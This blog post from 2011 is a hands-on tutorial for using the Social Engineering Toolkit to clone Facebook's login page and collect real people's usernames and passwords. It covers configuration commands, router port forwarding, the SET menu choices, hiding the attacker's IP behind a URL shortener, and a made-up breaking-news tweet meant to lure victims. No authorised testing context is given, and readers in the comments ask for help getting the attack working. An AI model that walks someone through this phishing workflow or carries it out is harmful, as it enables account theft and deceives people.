Latest News

Credential Harvesting With Facebook and the Social Engineering Toolkit

Saturday, April 16, 2011 , Posted by Nick Driver at 7:13 PM

I realize there are many tutorials already written online for how to use the Social Engineering Toolkit (SET), including one really good one over at Metasploit Unleashed that covers all of the basics.

However, I find that I generally mess around with this tool only a couple times a year when it gets a major update or I want to try some new attack vectors. Unfortunately, when I use it that infrequently, it means that I basically have to re-learn everything all over again. Therefore, I've decided to log everything here so next time I feel like I really need it, I know I can come back to reference this.

My goal here was to create an attack that would allow me to trick someone into sending me their login and password for Facebook. The general idea behind this attack is that SET will clone the target website (in this case, and host it on your personal computer. The trick then is to convince someone to visit a link you crafted that points to your fake Facebook clone and get them to log in with their credentials (displaying it in Metasploit). Once they send you their credentials, the server you are hosting points the victim back to the real Facebook login page and (hopefully) they never know what happened.

For this exercise I used Backtrack 4 R2 and the latest version of SET (updated 4/15/2011) over a regular home network with a NETGEAR WGR614v8 wireless router.

While it seems like this would be a relatively straightforward process using the easily navigated SET menu structure, there are a few things that needed to be modified first. First and foremost, most people running SET are not connected directly to the open Internet. Therefore, the SET configurations must be modified to not attempt to auto-detect your IP address. To do this, navigate to the SET directory and modify the set_config file using your favorite text editor. In this instance, I'm using gedit.

# cd /pentests/exploits/SET/config
# gedit set_config

Find the line that by default reads AUTO_DETECT=ON, change it to read AUTO_DETECT=OFF, and save and close the document. This will cause SET to prompt you for your external IP address when you launch the Credential Harvester, which you can find by going to

Next, we need to set up the router for port forwarding so people from the outside Internet can connect to the fake web server. In order to do this with my particular router, you must first navigate to and login to the control panel. From there, scroll down to Port Forwarding/Port Triggering on the left-hand side. From there, add a custom service that forwards traffic through Port 80 on TCP/UDP to your local IP address (in my case,

Now that our configurations are ready, the next step is to open SET. Either go to Start->Backtrack->Penetration->Social Engineering Toolkit->Social Engineering Toolkit or running the following from the command line:

# cd /pentest/exploits/SET/
# python set

That launches the following screen:

                      ::::::::  :::::::::: :::::::::::
                    :+:    :+: :+:            :+:
                   +:+        +:+            +:+
                  +#++:++#++ +#++:++#       +#+
                        +#+ +#+            +#+
                #+#    #+# #+#            #+#
                ########  ##########     ###

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Written by: David Kennedy (ReL1K)         [---]
  [---]         Development Team: Thomas Werth           [---]
  [---]                 Version: 1.3.4                   [---]
  [---]          Codename: 'Artillery Edition'           [---]
  [---]     Report bugs to:    [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage:        [---]
  [---]     Framework:    [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

    DerbyCon 2011 Sep30-Oct02 -

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Wireless Access Point Attack Vector
9.  Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit

Enter your choice:

From there, select option 2. Website Attack Vectors. Then you will see the following options:

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default):

Select option 3. Credential Harvester Attack Method

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4):   

Select option 2. Site Cloner

This option is used for what IP the server will POST to.
If your using an external IP, use your external IP for this.
Enter the IP address for the POST back in Harvester/Tabnabbing: 

Here you input your external IP address. Again, this can be found by going to

Enter the url to clone:

Here you put in the site you want to clone. In this instance, SET will then clone the site you input. Press return to progress past the message that mentions username and password form fields.

The server is now up and running. Anyone who now navigates to your external IP address will be presented with the fake Facebook login page you have cloned. Once they input their login credentials they will show up in your terminal and the victim will be forwarded to the real Facebook site.

Now, obviously most people will not click on a link that looks like a random IP address. However, there are multiple ways to disguise that link. My favorite of which is converting the IP address into a link. To do this, copy your external IP address and go to Paste the external IP address and click the 'shorten' button. This will convert the link to something like that looks a bit more friendly than a raw IP address. Then, you can feel free to add it to a specially crafted email sent to your victim, or cast a wider fishnet and post a Tweet like:

@Phisherman123: Shooting at Fells Point Pirate Festival

...and see who tries to log in!

Currently have 5 comments:

  1. Ashar Khan says:

    I need your help please help me

  1. protik says:

    I got a problem with external ip.when I give my ip address which supposed to show the fake web address but it shows my router login page.can u plz tell me what should I do?

  1. Nick Driver says:

    @protik You need to take a second look at your port forwarding and see where it's sending your incoming port 80 traffic.

  1. NISHANT says:

    Hey i m facing the same problem as protik...plz help me out

  1. Sir, when the victim enters my public ip, it shows up my modem login page rather than fake fb page!!
    What Should I do>??

Leave a Reply

Post a Comment